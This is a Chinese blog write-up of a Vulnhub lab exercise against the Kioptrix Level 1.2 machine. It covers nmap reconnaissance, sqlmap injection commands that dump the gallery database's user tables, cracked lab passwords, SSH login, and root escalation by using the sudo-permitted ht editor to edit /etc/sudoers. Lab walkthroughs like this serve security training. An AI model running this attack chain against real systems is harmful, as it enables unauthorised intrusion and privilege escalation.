首页 > 其他分享 >Vulnhub靶机:Kioptrix_Level1.2

Vulnhub靶机:Kioptrix_Level1.2

时间:2024-09-19 08:53:48浏览次数:15  
标签:Kioptrix sqlmap http -- 192.168 id Vulnhub Level1.2 gallery

信息收集

使用nmap主机发现靶机ip

kali ip 192.168.134.130

扫IP

使用nmap端口扫描发现靶机开放端口

nmap -A 192.168.134.156 -p 1-65535

打开网站,点击login,跳转到登录页面,发现该网站cms为:LotusCMS

访问 http://192.168.134.156/gallery

SQL注入

1、发现 url 中含 id 参数,sqlmap 测试SQL注入,存在

sqlmap -u "http://192.168.134.156/gallery/gallery.php?id=1" --batch

sqlmap -u "http://192.168.59.129/gallery/gallery.php?id=1" --batch --dbs			# 查询数据库名
sqlmap -u "http://192.168.59.129/gallery/gallery.php?id=1" --batch -D gallery --tables			# 查询gallery库下数据表
sqlmap -u "http://192.168.59.129/gallery/gallery.php?id=1" --batch -D gallery -T gallarific_users --dump		查询 user 表下用户
sqlmap -u "http://192.168.59.129/gallery/gallery.php?id=1" --batch -D gallery -T dev_accounts --dump
 
# admin:n0t7t1k4
# dreg:0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)
# loneferret:5badcaf789d3d1d09794d8f021f40f0e (starwars)

getshell

尝试另两组用户名密码,发现可通过 ssh 远程连接

ssh -oHostKeyAlgorithms=+ssh-dss [email protected]

提权

发现 loneferret 用户存在利用点

cat /etc/passwd

查看用户家目录

ls
cat CompanyPolicy.README

根据提示,执行命令

ssh -oHostKeyAlgorithms=+ssh-dss [email protected]
 
find / -perm -u=s -type f 2>/dev/null
sudo -l
sudo /usr/local/bin/ht
//报错Error opening terminal: xterm-256color.则 export TERM=xterm
//ht编辑器修改/etc/sudoers:F3 --> 查找 /etc/sudoers --> 添加 /bin/bash --> F2 保存 --> F10 退出
 
sudo /bin/bash

提权成功

标签:Kioptrix,sqlmap,http,--,192.168,id,Vulnhub,Level1.2,gallery
From: https://blog.csdn.net/2201_75569982/article/details/142220429

相关文章

  • vulnhub(9):sickos1.2(深挖靶机的各个细节、文件管道反弹shell详解、base64编码反弹shell
    端口nmap主机发现nmap-sn192.168.148.0/24​Nmapscanreportfor192.168.148.131Hostisup(0.00020slatency).​131是新出现的机器,他就是靶机nmap端口扫描nmap-Pn192.168.148.131-p---min-rate10000-oAnmap/scan扫描开放端口保存到nmap/scan下​......
  • Kioptrix Level-1.2
    信息收集sudoarp-scan-lnmap-sS-A192.168.0.159目标靶机开放了80端口http访问,浏览器访问查看使用dirb进行目录枚举网站探测根据页面提示,点击blog,得到线索http://kioptrix3.com/galleryhost绑定,将网站域名绑定与192.168.0.159绑定C:\windows\syste......
  • Vulnhub:Finding My Friend
    靶机下载地址靶机搭建时可能的报错靶机下载成功后在virtualbox中打开,启动虚拟机时报错virtualboxe_fail0x80004005,这个错误code说明可能存在配置错误、操作系统不兼容、硬件问题等。该靶机属于串口路径错误。我的解决办法是:靶机设置——》串口——》全部取消。信息收集......
  • Vulnhub-行星系列:Venus渗透-超详保姆式教学
    借用Vulnhub的一句话:请记住,VulnHub是一个免费的社区资源,因此我们无法检查提供给我们的机器。在下载之前,请阅读我们的常见问题解答部分,这些部分涉及运行未知VM的危险,以及我们关于“保护您自己和您的网络”的建议。如果您了解风险,请下载!靶机下载地址:https://download.vulnhu......
  • 看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-1_vulnhub-靶机
    Vulnhub靶机DriftingBlues-1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机漏洞详解:①:信息收集:②:目录爆破:③:暴力破解:④:提权:⑤:获取flag:Vulnhub靶机渗透总结:Vulnhub靶机介绍:vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开......
  • vulnhub靶场—————Momentum:2
    总体目标:       掌握单个目标机渗透思路本期内容:靶场地址:Momentum:2~VulnHubhttps://www.vulnhub.com/entry/momentum-2,702/靶场截图:总体思路:信息收集       漏洞发现利用       权限获取       目的达成具体实现:nmap主机发现,......
  • vulnhub靶场————Momentum:1
    总体目标:    掌握单个目标机渗透思路本期内容:靶场地址:Momentum:1~VulnHubhttps://www.vulnhub.com/entry/momentum-1,685/靶场截图:总体思路:信息搜集    漏洞利用    权限获取    目的达成具体实现:nmap主机发现、端口扫描dirsear......
  • Vulnhub靶机:AI-WEB-1.0
    一.网站查询二.扫描当前网站目录 扫出有http://172.16.1.88/robots.txt继续扫这个刚扫出来的,然后得出 我们再访问m3dinfo/info.php和 /se3reTdir777/这俩目录 得到如上图所示三.进行sql注入1.判断是否有sql注入 /有结果,有报错 2.利用burp抓包进行注入......
  • 【渗透测试】Vulnhub Hackable II
    渗透环境攻击机:   IP: 192.168.216.129(Kali)靶机:     IP:192.168.216.131靶机下载地址:https://www.vulnhub.com/entry/hackable-ii,711/进行渗透一、获取端口信息该虚拟机导入VMware需要在拯救模式中重新配置一下网卡名称,附上教程,不再赘述:https://blog.csdn......
  • 【渗透测试】Vulnhub DarkHole
    渗透环境攻击机:   IP: 192.168.216.129(Kali)靶机:     IP:192.168.216.130靶机下载地址:https://www.vulnhub.com/entry/darkhole-1,724/进行渗透一、获取端口信息nmap或者arp-scan都能扫除IP,这里就不赘述了。先看看开放了哪些端口。nmap-O-sV-p--A192.......